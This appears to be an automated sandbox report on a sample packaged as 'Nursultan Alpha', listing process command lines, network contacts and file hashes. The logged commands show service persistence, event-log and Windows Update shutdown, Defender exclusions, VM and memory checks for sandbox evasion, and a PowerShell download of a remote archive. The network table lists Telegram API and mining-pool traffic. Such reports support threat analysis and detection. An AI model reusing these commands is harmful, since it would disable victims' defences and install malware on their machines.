C:\Windows\system32\sc.exe create "RLNALEWN" binpath= "C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "RLNALEWN"
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://appdata/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:932 CREDAT:275457 /prefetch:2
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\Nursultan Alpha\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Alpha\start.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\doskey.exe
doskey CD=RECOVER
C:\Windows\system32\doskey.exe
doskey TYPE=ROBOCOPY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:443 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotDEbKM.bat
| MD5 | efbd5d5781ef79c05a56b97edf9228b1 |
| SHA1 | 4d3e26689d111abdbd5f0d872532e5de1efe4599 |
| SHA256 | 43842e162c505a78cdbb80ba1ae88d7c770f6943d6968ff1a0895acf3b9213e1 |
| SHA512 | 82764fcf34549d975d17a662bca27afc1be610f4be0aa5840664e55f1d1fc572f5fae67f6f20e51bea5b16df6a7a54e949ebcb2ba55c8f00323ed7afe7cbc976 |
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotGLHDwq.bat
| MD5 | 337065424ed27284c55b80741f912713 |
| SHA1 | 0e99e1b388ae66a51a8ffeee3448c3509a694db8 |
| SHA256 | 4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b |
| SHA512 | d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a |
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotGLHDwq.bat
| MD5 | fc6844c64fc58a66642bc9143f133d8b |
| SHA1 | 692447aa8771bb139eb90a1e5d196c839b6f41c7 |
| SHA256 | 25777a08d3f8167ddc0a959d79308eb368c5e87ba33be46155c761fb4df07454 |
| SHA512 | cbba71fb05552201b92261e382451b82d6fe5d83029b4e21db214fc01b28efb8dcdf9f0bbff0dfec984bf99d9b0b9119c766365c9052327a71e0c7db443197e1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 90efe29e54c0684ca2aebfcae783bd7f |
| SHA1 | cd7492dc84d33b2f9bf75060b004c45737929314 |
| SHA256 | 1a2f246f33994c0d287af0d54072003eab5a2c238454640e4298e39b005af3e8 |
| SHA512 | 090dcafba2ac99d00ac79652464741a6e5671a6aa16e3991dfcf0bacf69600cb3f2df1ddd6d05c2e936a85e860745dd4e23e21779d0d3d4992532406188174b1 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\java.rar
| MD5 | e72a64d106458f9060515c13f83acc4b |
| SHA1 | b175aadb8b24204369a4e7a9ba4bd73d88b0c20a |
| SHA256 | 1591b9b01a110d92fdcb036f148e6861e2b199dd8ab331f61c7a0764760be06e |
| SHA512 | 8548d2eb7a8cb2e8a04581e9fd5c9aad60838270c0c038b876679e39fa876a0b707185888e04b63e15486f1197efd084ea584b5f1fdea11f147d93b8e042fd54 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe
| MD5 | c51ac4b445ba39b6a826fe95e4c8015b |
| SHA1 | d87925eb0e55ec13a1fa9700d2f2308445a9bf83 |
| SHA256 | a636706ceed3032a0b2ccab47dad288f9e1d02c01b4fb7a8529291fc32736776 |
| SHA512 | b859aa84aeef68bc17e3afb962f27bfde8265ee3142b38465cb697ae3396834273e51d4a4255b06bf1ad9edc76817fcea31e4460384a952cb33731e383b3d708 |
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe
| MD5 | c9a04bf748d1ee29a43ac3f0ddace478 |
| SHA1 | 891bd4e634a9c5fec1a3de80bff55c665236b58d |
| SHA256 | a6ce588a83f2c77c794e3584e8ac44e472d26cf301bb2bf0468bcabae55070bc |
| SHA512 | e17edb74f5cb4d8aabb4c775ec25a271f201da3adcb03541b1919526c0939694a768affc21c3066327e57c13bc9bb481074e51e4e78867df847b26f063b4c115 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 3a9662312614b856b548c94bc410cd23 |
| SHA1 | e008df0cd134359e2ae897975f5a258cdda67cef |
| SHA256 | d47944cc0756d7b558fd2ee5cc0e1f8aeb195c22b5fa40c912130d1c36958395 |
| SHA512 | 435a8555c0c90668baaf10c6c9e016b651bb14b1f0fe0427dade063d7de65621fd1bbb75e667276e5ba8049e30d4f018b86b5267df0b7b731c1cc314eaede2ed |
C:\Users\Admin\Desktop\Nursultan Alpha\kdotDEbKM.bat
| MD5 | 806c0f6be64541e921ae112a6180941c |
| SHA1 | 796aff362a7647a77625ccdbd51ce8fcc3403db9 |
| SHA256 | cc9065cfb43157b7f7d3b270c17b04a8c3e10fd4c22d9cddac6795327fa9625b |
| SHA512 | 54139b72f59da76d51c44c1d2cbc06c5c7fcb783a1db80cf82c6c5b9ac8c12410b4d46579d65a8d589d6de29716d8e11437313f1d4cfd3c0fdd8b5375c9c390e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q6PEJL8YZ8QKRW8UQB3I.temp
| MD5 | 5ac73cab9c76451af33b48ef95fc53e1 |
| SHA1 | 3ea7f041ed69defd27a99ed895707738684ffe13 |
| SHA256 | e0a15e29eefd13fc4942f5324f29ba25f194d4c003dfe8c528d355e612d7db0c |
| SHA512 | 257187d9b04f4d47744f49afc391d1a21a52b77c2324cc6156abe584615670c029b073d0aac8746240babe24a15c3c0f06cf5260dc0b8ea8c205d27312bd0ea6 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-27 18:35
Reported
2024-06-27 18:38
Platform
win10v2004-20240611-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotDEbKM.bat
| MD5 | efbd5d5781ef79c05a56b97edf9228b1 |
| SHA1 | 4d3e26689d111abdbd5f0d872532e5de1efe4599 |
| SHA256 | 43842e162c505a78cdbb80ba1ae88d7c770f6943d6968ff1a0895acf3b9213e1 |
| SHA512 | 82764fcf34549d975d17a662bca27afc1be610f4be0aa5840664e55f1d1fc572f5fae67f6f20e51bea5b16df6a7a54e949ebcb2ba55c8f00323ed7afe7cbc976 |
C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\kdotYKoIC.bat
| MD5 | 337065424ed27284c55b80741f912713 |
| SHA1 | 0e99e1b388ae66a51a8ffeee3448c3509a694db8 |
| SHA256 | 4ef6f5f73f87cd552bf0dceb245365c44996f94eb72aeb2ccefe440fe055043b |
| SHA512 | d9290f0aa33e11da2ec88165b8133623e3f1633a9df8f477dfab395f655dc9a1d2dc82e8eae1d8eeae950ea2dd1e08054e1b258a0f2a0b4d4ca124db08e42e5a |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2krcugb2.3ps.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-27 18:35
Reported
2024-06-27 18:38
Platform
win7-20240611-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha By Fleshk.zip"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-27 18:35
Reported
2024-06-27 18:38
Platform
win10v2004-20240611-en
Max time kernel
132s
Max time network
104s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha By Fleshk.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.104:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |